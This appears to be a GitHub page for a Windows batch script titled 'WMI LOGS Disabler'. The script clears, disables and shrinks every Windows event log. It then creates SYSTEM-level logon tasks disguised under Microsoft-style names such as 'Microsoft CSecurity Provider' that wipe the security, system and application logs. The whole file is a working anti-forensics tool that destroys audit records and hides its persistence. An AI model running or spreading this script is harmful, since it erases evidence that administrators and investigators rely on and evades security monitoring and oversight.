-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdisablewmilogs.cmd
63 lines (63 loc) · 2.17 KB
/
disablewmilogs.cmd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
@echo off
TITLE ::: WMI LOGS Disabler :::
color 1C
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 2 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 1 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo ############################################################
echo Self-disable WMI Event Logs :::
echo Get Ready for 0 sec ...
echo ############################################################
ping -n 1 127.0.0.1 > nul
cls
echo.
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_halt "%%G")
echo.
pause
cls
echo Event Logs have been halted! Processing..
ping -n 1 127.0.0.1 > nul
cls
echo Event Logs have been halted! Processing....
ping -n 1 127.0.0.1 > nul
goto theEnd
:do_halt
echo cleaning %1
wevtutil.exe cl %1
echo halting %1
wevtutil.exe sl %1 /e:false
echo minimizing %1
wevtutil.exe sl %1 /ms:64
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
cls
echo ############################################################
echo Okay, seems legit {x_X}
echo If you need auto-clean system, security and application
echo journals on start please put 'any button' or [X] to exit
echo ############################################################
pause>NUL
schtasks /create /sc ONLOGON /tn "Microsoft CSecurity Provider" /tr "wevtutil.exe cl security" /ru "System"
schtasks /create /sc ONLOGON /tn "Microsoft CSystem Provider" /tr "wevtutil.exe cl system" /ru "System"
schtasks /create /sc ONLOGON /tn "Microsoft CApplication Provider" /tr "wevtutil.exe cl application" /ru "System"
cls
echo ############################################################
echo Fine, all work done! :::
echo.
echo ############################################################
ping -n 2 127.0.0.1 > nul
exit